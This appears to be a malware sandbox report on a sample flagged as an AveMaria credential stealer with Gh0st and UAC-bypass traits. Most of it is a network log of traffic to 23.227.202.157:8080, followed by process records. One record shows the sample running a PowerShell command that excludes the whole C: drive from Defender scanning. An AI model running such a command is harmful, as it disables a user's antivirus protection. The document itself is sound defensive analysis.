                                                                  May 22, 2022 12:34:30.454072952 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454102039 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454111099 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454150915 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454179049 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454194069 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454231024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454257011 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454272032 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454310894 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454324961 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454350948 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454391956 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454416990 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454432964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454473019 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454513073 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454551935 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454591036 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454593897 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454605103 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454633951 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454673052 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454684019 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454715014 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454736948 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454752922 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454780102 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454807997 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454818964 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454858065 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454898119 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454935074 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.454952002 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.454974890 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455014944 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455024958 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455051899 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455087900 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455091000 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455132008 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455142975 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455173016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455212116 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455233097 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455251932 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455291033 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455312014 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455332041 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455370903 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455410004 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455410957 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455467939 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455496073 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455535889 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455576897 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455631971 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455645084 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455672979 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455712080 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455734015 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455751896 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455790043 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455806017 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455828905 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455842018 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455871105 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455909967 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455950975 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.455955982 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.455977917 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456007004 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456017017 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456058025 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456094980 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456101894 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456135988 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456177950 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456223011 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456223965 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456264973 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456304073 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456329107 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456368923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456392050 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456408978 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456445932 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456471920 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456516027 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456557989 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456583977 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456595898 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456635952 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456653118 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456676960 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456715107 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456754923 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456758022 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456794024 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456831932 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456845045 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456871986 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456881046 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.456911087 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456949949 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456990004 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.456990004 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457026958 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457042933 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457067013 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457128048 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457153082 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457195044 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457232952 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457252979 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457273960 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457396984 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457408905 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457437992 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457557917 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457581043 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457601070 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457642078 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457664967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457721949 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457762957 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457803011 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457839966 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457848072 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457881927 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457918882 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457921028 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.457937002 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.457961082 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458002090 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458017111 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458041906 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458082914 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458123922 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458163977 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458183050 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458204031 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458231926 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458270073 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458271027 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458314896 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458384991 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458391905 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458431005 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458472013 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458511114 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458543062 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458549023 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458578110 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458590031 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458628893 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458668947 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458672047 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458714008 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458728075 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458753109 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458792925 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458821058 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458832979 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458872080 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458904982 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458913088 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458951950 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.458969116 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.458992004 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.459022045 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.459145069 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480554104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480613947 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480653048 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480668068 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480695009 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480710983 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480736971 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480751991 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480777025 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480818033 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480839014 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480856895 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480870962 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480899096 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480911970 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480940104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.480957985 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.480981112 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481014967 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481020927 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481060028 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481060982 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481082916 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481103897 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481122017 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481146097 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481183052 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481187105 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481218100 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481230021 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481230974 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481270075 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481280088 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481307983 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481321096 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481349945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481358051 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481389999 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481420994 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481429100 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481446028 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481468916 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481470108 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481509924 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481529951 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481549978 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481564999 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481590986 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481628895 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481642008 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481668949 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481673002 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481709003 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481724024 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481748104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481761932 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481790066 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481827974 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481853008 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481868029 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481873035 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481908083 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481921911 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481946945 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.481966972 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.481987000 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482001066 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482027054 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482038975 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482069016 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482074976 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482110023 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482126951 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482147932 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482171059 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482189894 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482191086 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482230902 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482269049 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.482292891 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.482312918 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.615020037 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.615080118 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.615101099 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.615118980 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:30.615143061 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.615245104 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:30.697097063 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:33.296505928 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:33.479185104 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:49.486371994 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:34:49.487315893 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:34:49.670778990 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:35:09.487752914 CEST80804974023.227.202.157192.168.2.3
                                                                  May 22, 2022 12:35:09.488626957 CEST497408080192.168.2.323.227.202.157
                                                                  May 22, 2022 12:35:09.673516035 CEST80804974023.227.202.157192.168.2.3

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:12:33:06
                                                                  Start date:22/05/2022
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
                                                                  Imagebase:0x400000
                                                                  File size:222720 bytes
                                                                  MD5 hash:DABC6F0C75C134E5310BA3526ADBA833
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:1
                                                                  Start time:12:33:12
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell Add-MpPreference -ExclusionPath C:\
                                                                  Imagebase:0x1c0000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:2
                                                                  Start time:12:33:12
                                                                  Start date:22/05/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7c9170000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:4
                                                                  Start time:12:33:14
                                                                  Start date:22/05/2022
                                                                  Path:C:\ProgramData\images.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\ProgramData\images.exe
                                                                  Imagebase:0x400000
                                                                  File size:222720 bytes
                                                                  MD5 hash:DABC6F0C75C134E5310BA3526ADBA833
